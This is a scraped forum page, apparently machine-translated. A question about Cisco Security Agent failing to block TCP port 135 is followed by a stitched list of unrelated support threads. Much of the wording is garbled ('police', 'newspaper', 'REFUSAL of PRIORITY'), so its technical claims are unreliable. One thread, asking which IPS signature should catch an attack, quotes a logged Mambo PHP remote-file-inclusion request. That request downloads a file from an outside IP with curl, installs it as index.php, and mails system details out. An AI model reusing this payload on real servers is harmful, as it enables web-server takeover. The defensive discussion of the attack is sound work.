Cisco Security Agent cannot close port 135/tcp on Windows hosts

Hello

I met with the problem that Cisco Security Agent cannot close port 135/TCP on PC windows (XP or Win7).

I configured the network access control module to prevent all client/server connections to port tcp/135 of the rule.

I checked my police using nmap, so this port (TCP/135) 20 minutes shows as filtered and I see connect event monitor on the CSA MC, over the next 20 minutes he see as open and no newspaper doesn't show. (not exact time, then it maybe 30 minutes or 5, this varies)

Can someone explain how TCP/135 works and it is possible to close it using the CSA?

Thanks in advance

There is another question for the same problem on the forums (see: CSA 6.0.2.145 problem with windows firewall 7). I wrote: -.

"I advanced and tested in the laboratory with winXP and CSA 602-149 (later). I've defined a rule with DENY tcp/135 and ran the nmap and reports of open (wireshark performances to the syn syn - ack). I changed it to a REFUSAL of PRIORITY and now closed nmap reports (wireshark shows restore the syn). Through the CLI, netstat - a watch the pc listening on tcp/135 & disabling the syn CSA Gets the syn - ack response. For me, this means a few flaws. 1: DENY should block tcp135 syn & 2: CSA does not send reset (it needs to be reset). Is it possible to open a TAC case and put my name (mwinnett) in it, and I'll open a defect. »

Matthew

Tags: Cisco Security

Similar Questions

  • Cisco security agents - Solaris zones

    Hello

    If anyone can help in question with the CSA?

    Are there official information that Cisco Security Agent cannot be installed on Solaris zones. Information on versions of Solaris, but not on the areas of release notes.

    Please visit the following link:

    The requirements for Solaris systems officer

    http://www.Cisco.com/en/us/docs/security/CSA/CSA601/Release_notes/CSA601RN.html#wp196425

    SongL

  • When Cisco Security Agent 6.0.2 comes out?

    When Cisco Security Agent 6.0.2 comes out?  Go off the 32-bit operating system and on Windows 2008 64 - bit OS.

    Scheduled for this month.

  • Windows 2003 & Management Center for Cisco Security Agents

    I'm sorry if this question has been asked before, but I was unable to see the answer here.

    The management center of CiscoWorks for Cisco Security Agents can be installed on a Windows 2003 Server?

    I'm asking because I am that it is difficult to find a new server that comes with Windows 2000.

    I'm not in the office at the moment, but I think the version I have is 4.5.

    Thank you

    Ian

    You're welcome and good luck.

  • PHP exploit triggers Cisco Security Agent but NOT at Cisco IPS... why?

    Does anyone know what signing this feat should trigger with the Cisco IPS sensor? You are not sure if there is one, or if we turned it off?

    We see this feat hit our Exchange servers several times during the week.

    The process of "C:\WINNT\System32\inetsrv\inetinfo.exe" (as user NT AUTHORITY\SYSTEM) received the data ' / index2.php? option = com_content & do_pdf = 1 & id = 1index2.php? _REQUEST [option] = com_content & _REQUEST [Itemid] = 1 & GLOBALS = & mosConfig_absolute_path =http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: / / 220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%[email protected] / * /; uname%20-a%20|%20Mail%20-s%20uname_i2_66.224.194.188%[email protected] / * /. com; echo |'.

    I think that this could be the exploit of mambo. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for the info. I searched on mambo MySDN and found GIS 5163 "Mambo Site Server Administration Password ByPass" here is a snippet of the description: "administrative access is acquired by sending a specific url using the index2.php script and the PHPSESSID variable." This looks like what you pasted. Note "index2.php". Your IPS can not seen this so it was more than 443.

    Hope this helps

    M

  • Cisco Secure ACS 5.3 SNMP agent does not

    Hello

    I have problems with the SNMP on Cisco Secure ACS 5.3 agent (patch level 5) stop, is there a quick way to restart the SNMP daemon via the command line?

    Robert,

    I understand where you come, I encountered the following bug:

    CSCte39351

    The process of the SNMP agent in demon device ACS stops.

    and reboot the box will bring him back to the top and after about 3 days, he'd stop. I just want to see if it's the same bug that could be back in patch 5. The best thing to do at this stage is to plan a quick down and restart the box to see if the snmp process starts again. If this then gives IT a week to see if the snmp Protocol falls down. If it does then make reference to this bug and open a new case of tac for repair. If not, then you should be in the clear.

    Thank you

    Tarik Admani

  • Vista Firewall blocks port 135, 445 of VPN connection

    Desktop computer is Vista x 64 Enterprise. I can access other computers at the office without any problem of file sharing. I am connected to the Home Office via VPN and I couldn't access the file sharing from my computer at home. After having turned off the firewall on the desktop computer, I was able to access file sharing. I found when the firewall is turned on, I can not telnet to port 135, 445 of my home computer, but I cannot telnet to these ports on another desktop computer.

    Computer is Windows 7 Pro.

    What changes can allow me access to the file sharing via VPN while keeping the firewall turned on?

    Ok. I found the answer by myself.

    Go to "Windows Firewall with advanced security" in "Administrative Tools".

    Select 'inbound rules.

    Find the "sharing of files and printers (SMB-In)" Local Port 445. There are several of these rules. Select the asset that has the green button. The default setting for "Remote address" is "Local subset". Change the "remote address" by "any". This works.

  • Cisco Secure ACS Solution Engine ping

    1. I installed Cisco Secure ACS Solution Engine with V3.3 and I can access via the http port 2002 but I can't it ping from anywhere in the network, but the server can ping every thing, is this normal.

    2. If I can't ping haw I can define the service keeplaive to load balance 2 ACS engine using CSS

    By the way, I forgot that ACS 3.3 device has a CSA integrated. This agent is enabled by default. He explains why you can't ping it.

    For enable/disable it, go to "System Setup Configuration - device. Toggle the checkbox enabled the CSA according to needs.

    http://www.Cisco.com/en/us/partner/products/sw/secursw/ps5338/products_user_guide_chapter09186a008023361d.html#wp859228

    Rgds,

    AK

  • TCP ip has reached the limit of security imposed on the number of tcp simultaneous connect

    Idle process original title: System, create tcp/ip connections to achieve maximum attempts allowed on win xp
    Continue to event viewer showing warning saying tcp/ip has reached the limit of security imposed on the number of tcp connect attempts simultaneous and system idle process, that's what causes this error.  To many connections 127.0.0.1:6999 127.0.0.1:4426 time_wait

    127.0.0.1:4427 TIME_WAIT
    etc etc etc.

    Hello

    Thanks for asking! If I have understood correctly, you receive tcp ip error message has reached the security limit imposed on the number of simultaneous tcp connect in Event Viewer. I suggest you follow the troubleshooting steps to check if this may help.

    1. don't you make changes on the computer before the show?
    2. when exactly do you face the question?
    3. what anti-virus is installed on the computer?

    Method 1:
    It is a warning that a malicious program or a virus can be run on the system. You can run a Microsoft security scanner to make sure that the computer is free from virus infection:
    http://www.Microsoft.com/security/scanner/en-us/default.aspx
    WARNING:
    If you run the antivirus program that is infected by the virus scan will get deleted. Therefore, reinstall the program. Also if the files and folders are affected by the virus, while they might even get deleted


    Method 2:
    Check the behavior by starting the computer in a clean boot state. How to configure Windows XP to start in a "clean boot" State
    http://support.Microsoft.com/kb/310353
    Note: When the diagnosis is complete do not forget to reset the computer to a normal startup. Follow step 7 in the above article.

    Method 3:
    Please close some of the connections (some types of downloads can use multiple connections).

    Check out the link:
    http://www.Microsoft.com/technet/support/ee/transform.aspx?ProdName=Windows+operating+system&ProdVer=5.2&EvtID=4226&EvtSrc=Tcpip&lcid=1033

    Please follow these recommended steps, review the additional information provided and post if you still experience the problem. I'd be happy to help you more

  • Cisco ASA 5500 Series 4-Port GE SSM

    Currently, we have 2 asa 5510 firewall and need to add the

    Cisco ASA 5500 Series 4 - Port GE SSM extension module. Can it be added when the device is turned on and running or the firewall must be turned off to install the plug-in?

    Hello

    You could try to ask this question of the team of firewall, as this page from the community for the physical security and video surveillance.  The team of firewall is located here:

    https://supportforums.Cisco.com/community/NetPro/security/firewall

  • With Cisco Secure ACS for Windows GANYMEDE +, authentication fails with AD

    I'll put up a Cisco Secure ACS 4.2 server to act as a RADIUS server for switches and routers I use Windows 2003 server for the candidate countries.
    and an Active Directory of Windows 2003 server.  The ad server is very good, it is used for many other things.

    I've implemented ACS as defined nit it installation guide, including all the steps in the "Member Server" section of the installation guide
    When you use AD as an external database (e.g. setting up services to run with a domain administrator account, set up a machine called "CISCO"
    on the field, etc.).

    I've set the unknown user policy to use the database of Windows, if the internal database does not contain the details of the user.

    If I add a user to the internal database, authentication goes through fine, with an entry in the journal "Authentication," spent

    02-24-2010, 05:07:03, authentic failed, eXXXX, Network Administrators (NDG), X.X.X.X, (default), internal error, (get the internal error error message)

    I scoured google etc and just cannot come up with any reason why this should be the case.
    I followed all of the installation to the letter guides.  I need to get this up and running as soon as possible,
    so am eager to know if someone can help me with this one!

    Thanks and greetings

    Sharan

    George,

    Internal error is fairly generic, but a common situation, we see this error is when ACS is installed on a

    64-bit computer.  ACS would not work with the active Manager when it is installed on the 64-bit before machines

    ACS 4.2.1.

    -Jesse

  • Email from bad security. Cannot reset security questions. catch 22! Help.

    Email from bad security. Cannot reset security questions. catch 22! Help.

    Try to use the service of Julian inconu of Apple. If you cannot reset their through it, you'll have to ask security team account Apple to reset your security questions. To contact them, click here and choose a method; If this page does not list one for your country or if you are unable to call, complete and submit this form.

    (144529)

  • Professional information package launched by mistake on my Mac. Since then, the computer is out of order.  The app is always open to the dock, but cannot close or force quit it. Power button doesn, t make a stop. Computer is NOT frozen, but apps does not

    Professional information file on my Mac. Since then, the computer is out of order.  App always opens in the dock, but cannot close or force quit it. Start button / stop is not make a judgment. Computer is NOT frozen, but apps does not open. Cannot shut down, restart, or use something else! Help!

    If you hold the button power for more than 10 seconds, it will not shut the MBP?

    Try a SMC reset:

    https://support.Apple.com/en-us/HT201295

    Ciao.

  • Cannot close the first with other (LH one end) tab open are closed.

    Cannot close the first tab (end of LH we) but others are closing. Indicator download on tab keeps indefinitely - running windows under all the tabs are functioning normally.
    Open another copy of Firefox allows all tabs to work normally in this copy

    If this does not work in mode without failure, then disable all extensions and then try to find out who is the cause by allowing both the problem reappears.

    • Choose "Disable all add-ons" on issues to troubleshoot Firefox in Safe Mode to set window to disable all extensions.
    • Close and restart Firefox after each change through "file > exit ' (Mac: ' Firefox > leave";) Linux: "file > exit ')

    See Troubleshooting extensions and themes and problems of hardware acceleration to resolve common Firefox problems

  • Error: Failed Application path: C:\Program Files (x 86) \Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe

    original title: genric hosted agent services

    Description

    The failing Application path: C:\Program Files (x 86) \Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe

    Signature of the problem

    Problem event name: APPCRASH

    Application name: svcGenericHost.exe

    Application version: 3.5.0.1163

    Application timestamp: 4d9d3841

    Fault Module name: StackHash_0a9e

    Fault Module Version: 0.0.0.0

    Fault Module Timestamp: 00000000

    Exception code: c0000005

    Exception offset: 74676c9c

    OS version: 6.1.7601.2.1.0.768.3

    Locale ID: 1033

    Additional information 1: 0a9e

    More information 2: 0a9e372d3b4ad19135b953a78882e789

    Additional information 3: 0a9e

    Additional information 4: 0a9e372d3b4ad19135b953a78882e789

    Additional information about the problem

    Bucket ID: 2507689456

    Maybe you shouod check with Trendmicro support.

    http://eSupport.trendmicro.com/en-us/default.aspx

Maybe you are looking for

  • Why Skype keep going back to the status "available"?

    I'm running a Droid 2 Turbo with OS 5.1.1 on Verizon.My version of Skype is 6.15.0.1162I am also running Skype on my LG3 tablet, with the same questions.As a lurker, I always want to be among the invisible ones, but if someone sends me a message, or

  • HP Photosmart C4780: error

    Salvo, he modello della mia stampante e C4780 ed ho no problema: error in file C:\Program Files (x 86) \HP\Digital Imaging\bin\hpqscloc\1033.xml of analysis. He mio e 8.1 Windows operating system e non più utilizzare potendo it cd Bolivia All della s

  • Printer is no longer available through sharing after the change of name of PC.

    share a printer after changing the name of the pc I have 5 (4 XP Pro, 1 Win7) PC with shared printer and file sharing.  The names of PC were not intuitive and I changed the more meaningful names.  File sharing has continued to work, but the printer w

  • The worksheet name change for the interactive user role

    Hi allI have a question about DRM security for users with access add to the sheet and only read access to the members. The requirement is that the user should be able to add a sheet and change all the properties associated with the leaves but cannot

  • Where can I find the serialno of my Acrobat

    I had to install Acrobat (originally 8 - see the history of commands) on a new Windows 7 PC. Well happened happened, but when I tried to uopgrade Pro XI I got the comment that it might be the version I alread have on my laptop (Yes, I have two acroba